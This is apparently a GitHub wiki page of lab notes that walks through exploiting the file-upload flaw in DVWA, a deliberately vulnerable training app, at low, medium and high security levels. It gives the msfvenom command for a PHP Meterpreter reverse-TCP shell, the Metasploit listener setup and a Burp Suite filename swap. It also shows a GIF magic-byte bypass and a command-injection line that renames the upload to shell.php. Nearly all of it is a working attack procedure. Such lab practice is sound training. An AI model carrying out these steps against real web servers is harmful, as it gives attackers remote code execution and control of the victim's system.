File upload in dvm - singirikondamani/Noted GitHub Wiki

Here’s a simplified step-by-step guide to exploit a file upload vulnerability at different security levels using Metasploit:

Steps for Low Security Level:

  1. Generate Payload:

    • Open a terminal on Parrot Security.
    • Type: sudo su (password: toor).
    • Navigate to root: cd.
    • Generate a PHP payload:
      msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.1.13 LPORT=4444 -f raw
    • Copy the generated payload.

  2. Create PHP File:

    • Navigate to Desktop: cd /home/attacker/Desktop/.
    • Open the editor: pluma upload.php.
    • Paste the payload and save the file as upload.php.

  3. Upload Payload:

    • Open Firefox, go to: http://10.10.1.22:8080/dvwa/login.php.
    • Login with Username: admin, Password: password.
    • Change DVWA security level to Low.
    • Go to File Upload.
    • Upload upload.php.

  4. Set Up Metasploit Listener:

    • In terminal, launch Metasploit: msfconsole.
    • Set up the listener: 
      use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 10.10.1.13
set LPORT 4444
run

  5. Execute the Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/upload.php.
    • The Meterpreter session starts.

  6. Confirm Access:

    • In Meterpreter, type: sysinfo to view the victim’s system information.

Steps for Medium Security Level:

  1. Generate Payload:

    • Follow steps 1-2 as above, but save the file as medium.php.jpg.

  2. Upload with Burp Suite:

    • Change DVWA security level to Medium.
    • Set up Burp Suite proxy to intercept requests (proxy: 127.0.0.1, port 8080).
    • Go to File Upload, upload medium.php.jpg.
    • In Burp Suite, intercept and change filename from medium.php.jpg to medium.php.
    • Forward the request.

  3. Set Up Listener:

    • Follow step 4 from Low Security Level.

  4. Execute Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/medium.php.
    • Meterpreter session starts.

  5. Confirm Access:

    • In Meterpreter, type: sysinfo.

Steps for High Security Level:

  1. Generate Payload:

    • Follow steps 1-2 as above, but save the file as high.jpeg.
    • Add GIF98 to the first line of the payload.

  2. Upload & Bypass:

    • Change DVWA security level to High.
    • Upload high.jpeg.
    • Use Command Injection to copy the file: 
      |copy C:\wamp64\www\DVWA\hackable\uploads\high.jpeg C:\wamp64\www\DVWA\hackable\uploads\shell.php

  3. Set Up Listener:

    • Follow step 4 from Low Security Level, but with LPORT=2222.

  4. Execute Payload:

    • Open Firefox, go to:
      http://10.10.1.22:8080/dvwa/hackable/uploads/shell.php.
    • Meterpreter session starts.

  5. Confirm Access:

    • In Meterpreter, type: sysinfo.

This concludes the steps for exploiting a file upload vulnerability at different security levels in DVWA using Metasploit.